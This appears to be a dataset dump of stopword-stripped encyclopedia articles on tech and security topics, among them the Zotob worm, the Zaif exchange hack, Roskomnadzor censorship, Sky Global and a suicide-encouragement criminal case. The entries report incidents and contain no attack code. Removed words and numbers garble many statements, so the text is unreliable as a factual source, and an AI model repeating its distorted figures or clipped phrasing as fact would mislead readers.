    <t>artificial intelligence english-language chatbot developed microsoft. successor chatbot tay. english version microsoft's successful chatbots xiaoice (china) rinna (japan). history first launched december 2016 messenger app. also available users facebook (via messenger), group chat platform groupme, followers twitter chat private messages. buzzfeed news report, told reporter "[the] quran violent" talking healthcare. report also highlighted made comment osama laden capture result 'intelligence' gathering.in july 2017, business insider asked windows good," replied joke microsoft's operating system: "it's bug, feature!' windows they asked "why," replied: "because windows latest attempt spyware." later would tell prefers windows runs windows 10.in april 2019 shut multiple platforms. reception came criticism biases introduced effort avoid potentially offensive subjects. chatbot refuses example engage mention—be positive, negative neutral—of middle east, qur'an torah allowing discussion christianity. article quartz exposed biases, chloe rose stuart-ulin wrote, politically correct worst possible extreme; mention triggers, transforms judgmental little brat." legacy holds microsoft's longest continual chatbot conversation: 1,229 turns, lasting hours minutes. discontinuation discontinued posting instagram, twitter facebook march 2019, discontinued chatting twitter skype march 2019. july 2019, discontinued facebook, samsung at&amp;t phones. september 2019, discontinued groupme. also (bot) xiaoice chatbot references</t>
  </si>
  <si>
    <t>Tech support scam</t>
  </si>
  <si>
    <t>Tech Bureau</t>
  </si>
  <si>
    <t>tech bureau, corp. internet software development company based nishi-ku, osaka, japan. services zaif zaif cryptocurrency exchange handles currencies including bitcoin, bitcoin cash monacoin. september 2018, ranked 35th largest cryptocurrency exchange turnover, sixteen cryptocurrency exchanges licensed regulated japanese financial services agency (fsa).on september 2018, exchange hacked equivalent million cryptocurrency stolen. hackers reportedly gained access "hot wallets" exchange held funds immediate transactions. tech bureau said notice breach monday, september breach promptly reported police fsa. hack resulted suspension withdrawals deposits, bailout agreement fisco, japanese company injected billion financial support tech bureau. references external links official website</t>
  </si>
  <si>
    <t>ZoneAlarm</t>
  </si>
  <si>
    <t>zonealarm internet security software company provides consumer antivirus firewall products. zonealarm developed zone labs, whose ceos kevin nickel, mouad abid shahin company acquired march 2004 check point. zonealarm's firewall security products include inbound intrusion detection system, well ability control programs open outbound connections. technical description zonealarm, program access controlled "zones", network connections divided. "trusted zone" generally includes user's local area network share resources files printers. "internet zone" includes everything without trusted zone. user grant permissions (trusted zone client, trusted zone server, internet zone client, internet zone server) programs attempt access internet (e.g. first use) zonealarm user grant permissions first access attempt."true vector internet monitor", also known "truevector security engine", windows service core zonealarm. processes list image name "vsmon.exe". this monitors internet traffic generates alerts disallowed access. "operating system firewall" (osfirewall) monitors programs generates alerts perform suspicious behaviors. osfirewall useful preventing rootkits spyware. "smartdefense advisor" name zonealarm give service available versions helps user certain types alert, using database trusted program signatures provide user advice allowing denying internet access response program requests. current free version zonealarm paid version pops every time turn computer short delay. awards certifications both free editions zonealarm firewall designated pcmag's editor's choice 2017. controversies january 2006, zonealarm reportedly sending data company's servers covert fashion. developer dismissed allegations zonealarm spying clients, saying issue related software updates would fixed.in december 2007, browser toolbar shipped zonealarm opt-out, well received. this removed later versions software. september 2010, free version zonealarm started showing "global virus alert" popup scareware tactic users switch paid security suite. popup turned zonealarm marketing team uproar disgruntled users, many uninstalled software. also comparison antivirus software comparison firewalls zonealarm z100g check point references external links official website</t>
  </si>
  <si>
    <t>Promotional fake United States currency</t>
  </si>
  <si>
    <t>promotional fake united states currency faux "currency" makes assertion legal tender. this money often created individuals promote practical jokes, social statements. legal print long makes assertion, whether appearance statement, authenticity. promotional united states fake currency confused counterfeit currency conflated legitimate currency demonetized. history 1970s, copper coins known nixon pennies made one-quarter size regular u.s. cent depicted president richard nixon obverse. reverse showed watergate hotel. they issued novelty items political commentary inflation occurred president nixon. other types coins similarly miniaturized since souvenirs collectors' items. though gold three-dollar coin produced 1800s, three-dollar bill ever produced. various fake us$3 bills also released time. these generally poke politicians celebrities richard nixon, michael jackson, george bush, bill hillary clinton, barack obama reference idiomatic expression "queer three-dollar bill" "phony three-dollar bill". 1960s, printed bill featured portrait alfred neuman read: "this legal tender—nor tenderizer help it." writer frank jacobs said magazine afoul secret service bill accepted change machines casinos.the united states never issued million dollar bill. however, many businesses print million dollar bills sale novelties. such bills assert legal tender. secret service declared legal print consider counterfeit. libertarian party makes annual tradition handing informational fliers made look like $1,000,000 bills april draw attention anti-income platform. notable example 7-figure bill currency magazine game features $1,329,063 bill serves maid game. players compete game lose money. bill features portrait alfred neuman. also disney dollars hell money monopoly money wooden nickel references external links promotional million dollar bill</t>
  </si>
  <si>
    <t>Zotob</t>
  </si>
  <si>
    <t>"the zotob worm several variations known rbot.cbq, sdbot.bzh zotob.d, infected computers companies abc, cnn, associated press, york times, caterpillar inc." business week, august 2005. zotob computer worm exploits security vulnerabilities microsoft operating systems like windows 2000, including ms05-039 plug-and-play vulnerability. this worm known spread microsoft-ds port 445. declared zotob worms cost average $97,000 well hours cleanup company affected. rbot variant zotob derived rbot worm. rbot force infected computer continuously restart. outbreak august 2005 covered "live" television, network's computers infected. zotob would self-replicate time computer rebooted, resulting computer numerous copies file time purged. this similar blaster (lovesan) worm. sequence events august 2005: security advisory"on august 9th, microsoft released critical security advisory ms05-039 revealed vulnerability plug-and-play component windows 2000. code patch loophole also made available." virus writing"in days since microsoft's announcement, virus writers released several variants zotob rbot, along updated versions older worms named sd-bot irc-bot, designed take advantage newly discovered flaw." august 2005: emerged saturday"the worms, called zotob rbot, variants them, started emerging saturday, computer security specialists said, continued propagate corporate networks came life beginning week." august 2005: took live"around p.m. problems began facilities york atlanta cleared minutes later.""cnn, breaking regular programming, reported personal computers running windows 2000 cable news network affected worm caused restart repeatedly.""the internet storm center, tracks worldwide impact computer worms, indicated site major internet attack underway. likely isolated event, became newsworthy infected. threats point, site read." august 2005: cibc banks, companies affected"cibc says zotob worm caused isolated outages, affect atms, internet phone banking. virus also canadian businesses caused widespread shutdowns." august 2005: suspect arrested morocco "under request fbi, moroccan police arrests 18-year-old farid essebar, moroccan, suspected behind spread virus." september 2006: sentencing"the creators zotob windows worm farid essabar friend achraf bahloul sentenced court morocco. arrest coders august 2005, farid essebar atilla ekici arrested morocco turkey, respectively. they believed behind worm's coding. signature zotob worm code suggested coded diabl0 server connects used previous version mytob. diabl0 believed incorporated code russian nicknamed houseofdabus whose journal shut authorities, arrest diabl0. coder (ekici) probably paid diabl0 (essebar) write code. says making money, care people remove worm spyware stuff installs that's making money, taylor said conversation me."on august 2005, controversial reports emerged different anti-virus firms. sophos declared several people access mytob source code variant worm). hand, f-secure declared found multiple variants mytob coded arrest essebar. those declarations suggest essebar part larger group dark-side hackers behind spread malware. also timeline notable computer viruses worms references external links sources security vulnerability information microsoft security bulletin ms05-039 (microsoft) microsoft security advisory (899588) (microsoft) cert vulnerability note vu#998653 (us-cert) secunia advisory sa16372 (secunia) can-2005-1983 (common vulnerabilities exposures) bugtraq 14513 (securityfocus) worm information what should know about zotob (microsoft) w32.zotob removal tool (symantec security response) worm_zotob.d (trend micro) zotob.a (f-secure) zotob.c (f-secure) worm_rbot.cbr (trend micro) full timeline (security blogger) zotob removal instructions news coverage news windows 2000 worm hits firms news windows 2000 starts virus news detained computer worm news money motive drove virus suspects york times virus attacks windows computers companies worm strikes windows 2000 systems msnbc computer worms strike media outlets reuters computer virus hits media outlets slashdot zotob worm hits goes global information week zotob proves patching "window" non-existent security now! podcast episode worm turns"</t>
  </si>
  <si>
    <t>Roskomnadzor</t>
  </si>
  <si>
    <t>federal service supervision communications, information technology mass media, abbreviated roskomnadzor (rkn) (russian: роскомнадзор [ркн]), russian federal executive agency responsible monitoring, controlling censoring russian mass media. areas responsibility include electronic media, mass communications, information technology telecommunications, supervising compliance law, protecting confidentiality personal data processed, organizing work radio-frequency service. history march 2007, authority—then subdivision cultural ministry russia called "russian federal surveillance service compliance legislation mass media cultural heritage protection" (rosokhrankultura)—warned kommersant newspaper mention national bolshevik party pages, party denied official registration.the federal service supervision sphere telecom, information technologies mass communications re-established 2008. resolution number 419, federal service supervision sphere telecom, information technologies mass communications", adopted february 2008.in december 2019, media criticized service's choice experts performing analysis referred publications assess compliance regulations. number experts recruited roscomnadzor associated pseudo-scientific sectarian movements, including hiv/aids deniers, ultra-conservative, anti-vaccination alternative medicine activists. three experts—anna volkova, tatyana simonova elena shabalina—assessed lyrics popular rapper egor kreed found "mutagenic effect", "satanic influence" "psychological warfare".also 2019, roskomnadzor published first iteration "list information resources past spreading unreliable information" including number social media groups media websites accused mostly incorrectly reporting single incident dzerzhinsk june 2019.after nationwide pro-navalny protests 2021, roskomnadzor fined seven social media companies removing pro-navalny videos: "facebook, instagram, twitter, tiktok, vkontakte, odnoklassniki youtube fined non-compliance requirements prevent dissemination calls minors participate unauthorized rallies" said statement published website.on march 2022, 820gb roskomnadzor data leaked published, hacking group anonymous claiming responsibility. anonymous engaged several cyberattacks russian websites 2022 russian invasion ukraine occurred. purpose roskomnadzor federal executive body responsible control, censorship, supervision field media, including electronic media mass communications, information technology communications functions control supervision compliance personal data processing requirements legislation russian federation field personal data, role co-ordinating activities radio frequency service. it's authorized federal executive body protection human subjects personal data. also body administering russian internet censorship filters. also designs implements procedures russian autonomous internet subnetwork, like inventory russian autonomous systems, alternative root servers russian national domain name system, controls local isps interconnect internet exchanges. main goal provide access russian autonomous internet subnetwork even disconnect isolation global internet (sovereign internet law) enforcement actions march 2013 york times reported russia "selectively blocking [the] internet". 2014, crimea crisis, roskomnadzor number websites criticising russian policy ukraine blocked, including blog alexei navalny, kasparov.ru грани.ру. also, june 2016 amazon services entirely blocked couple hours poker app. github october 2014, github blocked short time. december github blocked satiric notes, describing "methods suicide", caused major tensions among russian software developers. unblocked december 2014 github special page dedicated roskomnadzor-related issues. content remains available non-russian networks. russian wikipedia april 2013, confirmed spokesperson roskomnadzor wikipedia blacklisted article "cannabis smoking" (курение каннабиса) russian wikipedia.on august 2015, article russian wikipedia charas (чарас (наркотическое вещество) russian)) blacklisted roskomnadzor containing propaganda narcotics. article rewritten scratch using materials textbooks, august included list forbidden materials sent internet providers russia. wikipedia uses https protocol encrypt traffic, effectively site language versions wikipedia blocked russia night august 25.on march 2022, roskomnadzor threatened block access russian wikipedia article "вторжение россии украину (2022)" ("russia's invasion ukraine (2022)"), claiming article contained "illegally distributed information" including "reports numerous casualties among service personnel russian federation also civilian population ukraine, including children". roskomnadzor made similar threats march, demanding wikipedia remove information invasion "misinforming" russians could face fine million rubles (approximately us$49,000). daily stormer 2017, neo-nazi website daily stormer briefly moved russian domain, roskomnazdor subsequently acted remove access, site subsequently moved dark web. telegram april 2018, roskomnadzor ordered russian isps block access instant messenger telegram, company refused hand encryption keys users' chats russian authorities. information watchdog applied method mass blocks, hitting major hosting providers, amazon, disrupting hundreds russian internet services. roskomnadzor abandon approach, failed implement means stop russian users accessing telegram. end, roskomnadzor government structures channels "outlawed" app. mid-2020 roskomnadzor officially gave trying block telegram. twitter march 2021, roskomnadzor started "slow down" twitter users russia, attributing decision platform's failure remove content deemed illegal russian government. this action occasionally caused russia's websites, including roskomnadzor itself, stop working. also malfunctions major commercial services, qiwi payment system, blocked users accessing yandex, google, youtube. addition, along twitter, roskomnadzor throttled access numerous websites domain names ending "t.co" (t.co among twitter domain), thus affecting fewer thousand hosts, including github, russia today, reddit, microsoft, google, dropbox, steam.on february 2022, following russian invasion ukraine, twitter said access platform restricted users russia. march, roskomnadzor slowed access twitter, accusing company failing remove called "fake posts" "special operation".on april 2022, twitter fined million rubles (usd 41,000) sued roskomnadzor removing content included instructions prepare molotov cocktails russian armored vehicles. meta march 2022, roskomnadzor said blocking access facebook restrictions imposed russian state media outlets. march, action taken court ruled meta platforms guilty "extremist activity", affecting access facebook instagram whatsapp. ruling came reuters report stated meta would allow users post messages supporting violence russian soldiers russian president vladimir putin following invasion ukraine, however meta later narrowed moderation policy prohibit calls death head state. google april 2022, roskomnadzor fined google billion rubles (usd million), removing claimed illegal content youtube. tiktok april 2022, roskomnadzor drew protocol court moscow fined tiktok million rubles (usd 27,000) removing content related lgbt community. chess.com april 2022, roskomnadzor blocked online chess website chess.com russia articles critical russian invasion ukraine links replacing flags russian users website. also cyberspace administration china censorship russia federal agency press mass communications russian federation (rospechat) information privacy internet censorship russia notes references further reading external links official website english) official website russian)</t>
  </si>
  <si>
    <t>Zscaler</t>
  </si>
  <si>
    <t>zscaler ((us english)) cloud security company, headquarters jose, california. offers platform businesses move data cloud, employees work remotely. history zscaler founded 2007 chaudhry kailash. august 2012, zscaler secured million funding strategic investors. march 2018, company initial public offering raised $192 million. company traded nasdaq using symbol zscaler stock added nasdaq december 2021.in 2019, zscaler received stevie award most innovative tech company year. july 2021 zscaler issued pending patents. acquisitions products products produced company zscaler private access provides secure access locally hosted applications, zscaler internet access provides secure access external applications.the zscaler zero trust exchange platform connects users, devices, applications network. platform based proxy architecture. zscaler zero trust exchange also protects applications workloads. zscaler cloud protection (zcp) service automatically remediates security gaps, minimizes attack surface, eliminates lateral threat movement. helps organizations secure workload configurations permissions, secure user access cloud apps, secure app-to-app communications. references external links business data zscaler:</t>
  </si>
  <si>
    <t>Security Shield</t>
  </si>
  <si>
    <t>security shield (also known securityshield) series rogue security software programs asks amount money "full" version protection minor non-existent viruses. references</t>
  </si>
  <si>
    <t>WhopperCoin</t>
  </si>
  <si>
    <t>whoppercoin cryptocurrency launched russian branch burger king loyalty program summer 2017. primarily notable first issuance branded cryptocurrency major company first form loyalty points could traded freely; noted burger king "first major corporate brand issue crypto-cash", whoppercoin turning burger "investment vehicle". hosted waves blockchain platform.the cryptocurrency prove successful: whoppercoins traded prices high usd$0.14 september 2017, january 2018 price fallen less usd$0.002, september 2019 trading volume declined zero. implementation whoppercoin transactions hosted waves platform, rival ethereum. waves blockchain ledger distributed record transactions resistant tampering alteration), tracked ownership whoppercoin recorded transactions. billion coins initially issued.whoppercoins permitted bought, sold given away freely, meant could used financial instruments traded exchanges alongside cryptocurrencies. june 2017, burger king russia announced would begin accepting bitcoin. august, ivan shestov, head external communications burger king russia, referred whoppercoin "investment tool" quoted saying "eating whoppers strategy financial prosperity tomorrow".the specifics implementation initially unclear; august, york magazine fortune cited russian-language article rusbase saying customers would receive whoppercoin whopper purchased initial would loyalty program whoppercoins could used purchase menu items. time, company established exchange rate whoppercoins could used make burger king purchases. august, however, sources began reflect whoppercoin would given ruble spent whopper, whopper would able purchased 1,700 whoppercoins. this meant free whopper could obtained every "five six" purchased normal currency. also added customers would able claim coins scanning receipts smartphone, android iphone apps expected released september 2017. impact september 2017, immediately launch, whoppercoin valued usd$0.14. previously, burger king pioneered cryptocurrency fast food industry netherlands branch accepting bitcoin 2016. additionally, reports june 2017 said burger king russia "would accepting bitcoin payment". however, time whoppercoin's launch, cnbc noted previous attempts toward cryptocurrency adoption burger king russia poorly received russian government, 2016 reports "suggesting users could even face jail time proposed legislation". however, subsequent statements showed support idea, including interview first deputy prime minister igor shuvalov said supporter, cryptoround [sic] must exist." however, time, legal framework cryptocurrency existed russia, remained illegal cryptocurrencies payment goods services.whoppercoin widely given serious consideration. upon release, fortune contrasted "cryptocurrencies actually use", york magazine sardonically praised "way satiate appetite need rather useless virtual money". verge described shestov's claim "eating whoppers strategy financial prosperity tomorrow" "bit stretch"; september 2017, business insider cited evidence "ico craze" "reached zenith". marketing week said cryptocurrencies "described extreme gimmicks simply make good fodder stunts, economic paradigm", described burger king russia's move "capitalising blockchain buzz".despite this, whoppercoin's uniqueness widely discussed. adweek praised burger king's "knack hijacking hype train" pointed potential direction corporate loyalty programs. garrick hileman, research fellow cambridge centre alternative finance, compared favorably airline miles programs, cannot traded financial instruments (or, generally, entity besides issuing company affiliates); possibility trading whoppercoin currencies assets potential make "more compelling standard loyalty scheme". emin sirer, associate professor cornell university, said rewards points "actually good case blockchains" whoppercoin likely first many similar programs. conversation bbc, cautioned also potential used vehicle ransomware money laundering. demise despite initial fanfare, program successful. january 2018, price whoppercoin (which usd$0.14 september 2017) fallen less usd$0.002. while token dedicated asset page waves' website launch 2017, verdict reported "despite strong start, whoppercoin died fairly quickly". although later cryptocurrency initiatives burger king would success (the german branch began accepting bitcoin 2019), whoppercoin not. september 2019, trading volume stood zero. october 2019, wired noted whoppercoin "long lost sizzle", along thousands similarly ambitious cryptocurrency ventures, many characterized "blockchain memes". references</t>
  </si>
  <si>
    <t>ZumoDrive</t>
  </si>
  <si>
    <t>zumodrive defunct cloud-based file hosting service operated zecter, inc. december 2010, zecter announced acquisition motorola mobility. service enabled users store sync files online, also computers using hybridcloud storage solution; latter functionality stopped working approximately september 2011, former undergoing formal takedown 2012. zumodrive cross-platform client (windows, macos, linux, ios, android, palm webos) enabled users copy file folder zumodrive virtual disk synced users' computers hand-held devices. files zumodrive virtual disk could shared zumodrive users accessed web. users could also upload files manually browser interface. free zumodrive account offered storage, users could upgrade paid plans ranging monthly subscription fee. zumodrive service integrated yahoo! mail, allowing users send receive file zumodrive (the integration yahoo! mail stopped june 2012), powers hp's recent clouddrive technology, bundled mini netbooks. history zumodrive created silicon valley based company zecter, founded david zhao, kevin west, vijay mani 2007. zhao former application developer amazon west mani former microsoft employees. company received seed funding combinator, tandem entrepreneurs, seed early-stage investors. additional round $1.5 million funding secured late october 2009, sherpalo ventures, tandem entrepreneurs verifone douglas bergeron participating. development zumodrive began 2008 product launched january 2009.on december 2010, zecter announced acquisition motorola mobility.zumodrive announced service would longer available june 2012 although users cruzsync, toshiba branded services initially unaffected. functionality while zumodrive functioned file synchronization storage service, employed approach allows content cloud appear local filesystem. zumodrive synchronization uses transfers aes-256 encryption, supports revision history—by deltas delta encoding technology—so files deleted zumodrive virtual disk recovered synced computers. zumodrive's version control also helped users know history file currently working enabling person edit re-post files without edit conflicts loss information. there limit file size files added zumodrive client. zumodrive used amazon's simple storage service store files cloud. zumodrive service unique file sync storage service content appears local filesystem streamed cloud demand. users stream music directly zumodrive iphone, ipod touch, android webos devices. zumodrive service also offers intelligent "predictive caching" allows copies frequently used files stored locally users access files internet access. zumodrive allows users selectively synchronize individual files, folders, entire virtual drive. users also link folders place computers zumodrive, folders content stay sync across devices. zumodrive service allows storage-restricted devices (e.g., netbooks, iphones, webos, android handsets), full access cloud, thereby making devices appear large data available cloud. criticism slow broadband connection speeds make streaming large files, movies mobile remote devices difficult.while zumodrive encrypts transport content 256-bit ssl, stores content encrypted amazon servers, content still accessible zumodrive administrators. also list online backup services comparison online backup services file synchronization file hosting service cloud computing references</t>
  </si>
  <si>
    <t>Teamwire (former Grouptime)</t>
  </si>
  <si>
    <t>teamwire technology start-up based munich, germany, originally called grouptime gmbh. company focuses mobile messaging apps secure communications regulated industries. core product teamwire, encrypted instant messaging enterprises public sector. addition text messaging, users send photos, videos, locations, voice messages files teamwire. history company founded august 2010 munich (germany) tobias stepan. september 2011 grouptime officially launched devices apple`s ios. 2012 several updates released improve group messaging sharing digital content. march 2014 grouptime launched secure enterprise messaging called teamwire simplify improve internal communication. idea provide messenger businesses, replace email dominant channel team communication. 2014 grouptime abandoned consumer product completely focused enterprise messaging market. january 2015 addition german cloud teamwire became also available on-premise private cloud deployment order fulfill strong data protection requirements enterprises, large corporations public sector. march 2016 teamwire became cross-platform enterprise messaging release apps desktop devices like windows, linux addition existing android apps.in january 2017 largest german financial services group deployed teamwire secure messenger bank. 2017 became public police state bavaria germany uses teamwire secure alternative whatsapp. references</t>
  </si>
  <si>
    <t>Template:Password managers</t>
  </si>
  <si>
    <t>initial visibility: currently defaults autocollapse template's initial visibility, |state= parameter used: |state=collapsed: {{password managers|state=collapsed}} show template collapsed, i.e., hidden apart title |state=expanded: {{password managers|state=expanded}} show template expanded, i.e., fully visible |state=autocollapse: {{password managers|state=autocollapse}} shows template collapsed title {{navbar}}, {{sidebar}}, table page collapsible attribute shows template expanded state collapsible items page |state= parameter template page set, template's initial visibility taken |default= parameter collapsible option template. template page, currently evaluates autocollapse.</t>
  </si>
  <si>
    <t>William Francis Melchert-Dinkel</t>
  </si>
  <si>
    <t>william francis melchert-dinkel (born july 1962) american former licensed practical nurse convicted 2011 encouraging people commit suicide. told contemplating suicide methods worked best, acceptable choice take life, would better heaven, and/or falsely entered suicide pacts them. married father two. wife, joyce melchert-dinkel stood accepting suicide sexual fetish court.melchert-dinkel originally convicted counts assisting suicide encouraging july 2005, suicide 32-year-old mark drybrough, british technician, march 2008, suicide 18-year-old nadia kajouji, canadian college student, internet chat rooms. those convictions later overturned minnesota supreme court found part state used convict unconstitutional. remand, melchert-dinkel convicted count assisting suicide, count attempted assisting suicide. served days jail probation years. victims william francis melchert-dinkel allegedly victims internet suicide chat rooms, posed depressed woman using aliases "cami "falcongirl". according affidavit, melchert-dinkel spoke dozens people course four five years, encouraging kill (typically hanging). said successful least five instances. nadia kajouji; canada melchert-dinkel convicted relation suicide 18-year-old nadia kajouji, became depressed leaving home begin studies carleton university ottawa, ontario, canada. jumped bridge found drowned rideau river april 2008. kajouji conversed online someone posing young woman–now known melchert-dinkel–who suggested hang herself, gave detailed instructions told capture final moments webcam (s)he others could watch part joint suicide pact. police paul, minnesota, said confirmed "had conversing melchert-dinkel online prior disappearance", including suicide.the ottawa police service decided charge melchert-dinkel canada's assisted suicide law. mark drybrough; england melchert-dinkel also convicted relation suicide mark drybrough, 32-year-old british technician who, wake suffering nervous breakdown depression, hung home coventry, warwickshire, england, july 2005, allegedly chatting months someone allegedly using aliases falcongirl melchert-dinkel charged counseling drybrough kill himself. investigations november 2006, celia blay, retired british schoolteacher living maiden bradley, wiltshire, received word teenaged friend south america entered suicide pact young nurse. blay investigated melchert-dinkel's identity discovered previously agreed earlier suicide pacts. successfully convinced girl break pact four hours planned suicide. throughout following year, blay posted warnings chat websites. also discovered melchert-dinkel's "falcongirl" "cami identities, talked users entered pacts arranged attempted victims front webcams. after months collecting evidence melchert-dinkel's activities, blay approached local police. they opted investigate. january 2008—around time melchert-dinkel corresponding kajouji—blay friend, lowe, sting catch "cami attempting suicide pact. correspondence melchert-dinkel described seeing birmingham, thought drybrough, hang webcam. lowe blay gained melchert-dinkel's trust found information traced back address residence minnesota. stroke luck, also melchert-dinkel webcam feed, posing "cami blay submitted affidavit matter federal bureau investigation, received response. however, saint paul police department minnesota internet crimes against children task force agreed take case. charges melchert-dinkel convicted march 2011, criminal complaint filed rice county, minnesota. charged advising, encouraging, assisting kajouji drybrough taking lives using internet correspondence. ordered internet case underway.while encouraging suicide illegal, laws north america britain previously successfully used prosecute anyone promoting suicide internet. found guilty aiding suicide minnesota law, provides penalties anyone "intentionally advises, encourages, assists another taking other's life"; punishment years prison fine $30,000. sentenced 2011, days jail.on july 2012, minnesota court appeals affirmed conviction. minnesota supreme court subsequently agreed review case. march 2014, supreme court reversed conviction remanded. high court held minnesota statute melchert-dinkel convicted unconstitutional part. court held merely advising encouraging suicide speech protected first amendment u.s. constitution, prohibitions unconstitutional. went hold, however, speech actually assisted suicide protected. since trial court made factual findings respect encouraging advising, supreme court reversed conviction. remanded case, however, lower court determine whether melchert-dinkel actually assisted suicides within meaning statute. retrial second conviction october 2014, rice county district judge thomas neuville sentenced william melchert-dinkel years prison, suspended sentence melchert-dinkel serves days jail abides terms probation years release. month prior sentencing, judge neuville found melchert-dinkel "intentionally advised encouraged" drybrough kajouji commit suicide, case remanded minnesota supreme court.melchert-dinkel convicted assisting suicide mark drybough attempting assist suicide nadia kajouji, ultimately took life jumping bridge frozen river, rather hanging, melchert-dinkel allegedly suggested online. during second sentencing hearing, melchert-dinkel stated, sorry... actions done. repented."william melchert-dinkel reported jail october 2014. even release prison february 2015, lawyer continued appeal conviction. references external links minnesota melcher-dinkel, complaint, april 2010 infirmier américain dans l'eau chaude", droit (french), march 2009 "enfermero alentaba suicidas potenciales internet", inforamador (spanish), october 2009 američan nabádal chat tínedžerov samovraždu "američan nabádal chat tínedžerov samovraždu", tvnoviny (slovak), march 2010 intihar röntgencisi!", mynet.haber (turkish), march 2010 "man moedigt mensen zelfmoord plegen voor webcam", buitenland (dutch), march 2010 "i̇nternette intihar ettiriyor", hurriyet (turkish), march 2010 "i̇ntihar röntgencisi kişiyi öldürmüş!", millyet.com (turkish), march 2010 "suicide d'une étudiante d'ottawa; internaute américain accusé", radio-canada (french), april 2010 americano acusado encorajar suicídios "ex-enfermeiro americano acusado encorajar suicídios web", estadão (portuguese), april 2010 mạng cuối)", (vietnamese), june 2010</t>
  </si>
  <si>
    <t>Team Xecuter</t>
  </si>
  <si>
    <t>team xecuter hacker group known making chips jailbreaking game consoles. among console hackers, primarily consist hobbyists testing boundaries believe open-source model, team xecuter controversial selling hacking tools profit. console systems targeted group include nintendo switch, nintendo 3ds, classic edition, sony playstation, microsoft xbox microsoft xbox 360.in september 2020 canadian national, gary "garyopa" bowser, french national, "maximilien" louarn, arrested designing selling "circumvention devices", particular, products circumvent nintendo switch copy protection, named, along chinese citizen yuanning chen, federal indictment filed u.s. district court seattle, august 2020. each three named indictment faced felony counts, including conspiracy commit wire fraud, conspiracy circumvent technological measures traffic circumvention devices, trafficking circumvention devices, conspiracy commit money laundering. bowser handled public relations group, operation since least" 2013. october 2021, bowser pled guilty charges related distribution team xecuter's devices, agreeing $4.5 million penalty continue work authorities continued investigation team xecuter exchange dropping nine charges him. december, ordered another million nintendo. february 2022, bowser sentenced months prison.nintendo separately filed civil lawsuit bowser april 2021 related three counts copyright infringement, seeking damages $2500 trafficked device, $150,000 copyright violation.nintendo also successfully prevailed lawsuits involving resellers team xecuter devices. references further reading</t>
  </si>
  <si>
    <t>Sky Global</t>
  </si>
  <si>
    <t>global communications network service provider based vancouver, canada. notable products secure messaging application secure phones. significant share users systems international crime organizations involved drug trafficking, company management suspected collusion. series raids criminal organizations several countries early 2021, part sky's infrastructure western europe dismantled, department justice issued arrest warrant company's jean-françois eap. march 2021, company apparently shut operations blackberry, inc. services. website seized fbi. products subscription-based end-to-end encrypted messaging application. originally developed blackberry platform, uses elliptic-curve cryptography (ecc) encryption. features "self-destruction" messages user-defined expiration period. phones company modified nokia, google, apple blackberry phones, phones supplied company cameras, microphones disabled. messages encrypted automatically deleted thirty seconds. phone contactable network, message would retained hours, deleted.the phones kill switch user entered "panic" password, device would delete contents. company website offered us$4 million (€3.2 million euro) prize anyone could break encryption within days. they support android, blackberry iphone apps.messages stored using 521-bit elliptic-curve cryptography network connections protected 2048 ssl.171,000 devices registered, mainly europe, north america, several central south american countries mainly colombia middle east. quarter active users belgium (6,000) netherlands (12,000), half said around port antwerp. raids march 2021 around 1600 belgian police carried raids arrested people seized €1.2 million cash tonnes cocaine. those arrested included lawyers members hells angels, serving police officers, employee public prosecutor's office, civil servants, officials hospital administrators suspected providing information gangs, people suspected gang-related violence.belgian federal prosecutor frédéric leeuw said "the operation concentrated taking infrastructure, dismantling distribution network seizing criminal assets distributors" many devices possible" seized identified users. federal prosecutor said encryption succeeded. send account number federal police".belgian dutch authorities alleged able access network february 2021 shortly raids. about billion messages intercepted, half decrypted april 2021—further avenues inquiry expected open decryption progressed. belgian police said network broken trusted criminal users images torture, execution orders, insider financial operational information freely sent.raids netherlands part operation argus, followup lermont operation used take encrochat.sky global disputed claims servers compromised, claiming aware fake "sky ecc" available unsecure phones.sky global said "actively investigating pursuing legal action offending individuals impersonation, false lights, trademark infringement, injurious falsehood, defamation fraud". indictment shutdown march 2021, department justice diego, california, issued indictment global's ceo, jean-francois eap, former distributor, thomas herdman. they charged "conspiracy violate federal racketeer influenced corrupt organizations (rico)", arrest warrants issued. indictment states global's devices "specifically designed prevent enforcement actively monitoring communications members transnational criminal organizations involved drug trafficking money laundering. part services, global guarantees messages stored devices remotely deleted company device seized enforcement otherwise compromised."in response, published statement branding allegations false, saying company "targeted" "build tools protect fundamental right privacy." "sky global's technology works good all. created prevent police monitoring criminal organizations; exists prevent anyone monitoring spying global community. indictment personally example police government trying vilify anyone takes stance unwarranted surveillance."on march 2021, company apparently shut operations blackberry united endpoint manager services. website seized fbi. possible consequence joris crime reporter gazet antwerpen, noted importance operation sky, saying, blow because, belgium great part criminal underworld netherlands, really trusted system. they full confidence, police much information underworld structured, bank accounts, corrupt contacts arrested. takes years build networks south america thinking, 'let's business dutch belgian guys more' everyone waiting storm asking police know." references</t>
  </si>
  <si>
    <t>Template:Pandora Papers</t>
  </si>
  <si>
    <t>initial visibility: currently defaults autocollapse template's initial visibility, |state= parameter used: |state=collapsed: {{pandora papers|state=collapsed}} show template collapsed, i.e., hidden apart title |state=expanded: {{pandora papers|state=expanded}} show template expanded, i.e., fully visible |state=autocollapse: {{pandora papers|state=autocollapse}} shows template collapsed title {{navbar}}, {{sidebar}}, table page collapsible attribute shows template expanded state collapsible items page |state= parameter template page set, template's initial visibility taken |default= parameter collapsible option template. template page, currently evaluates autocollapse.</t>
  </si>
  <si>
    <t>Timeline of events associated with Anonymous</t>
  </si>
  <si>
    <t>anonymous decentralized virtual community. they commonly referred internet-based collective hacktivists whose goals, like organization, decentralized. anonymous seeks mass awareness revolution organization perceives corrupt entities, attempting maintain anonymity. anonymous hacktivist impact. this timeline activities reported carried group. 2006–2007 turner raid according radio turner, december 2006 january 2007 individuals identified anonymous took turner's website offline, costing thousands dollars bandwidth bills. result, turner sued 4chan, ebaum's world, 7chan, websites copyright infringement. lost plea injunction; however, failed receive letters court, caused lawsuit lapse. chris forcand arrest december 2007, canada-based toronto newspaper published report arrest alleged internet predator chris forcand. forcand, charged counts luring child attempt invite sexual touching, attempted exposure, possessing dangerous weapon, carrying concealed weapon. report stated forcand already tracked "cyber-vigilantes seek anyone presents sexual interest children" police investigations commenced.the global television network report identified group responsible forcand's arrest "self-described internet vigilante group called anonymous" contacted police members "propositioned" forcand "disgusting photos himself". report also stated first time suspected internet predator arrested police result internet vigilantism. 2008 project chanology group gained worldwide press project chanology, protest church scientology.on january 2008, video produced church featuring interview cruise leaked internet uploaded youtube. church scientology issued copyright violation claim youtube requesting removal video. response this, anonymous formulated project chanology. calling action church scientology form internet censorship, members project chanology organized series denial-of-service attacks scientology 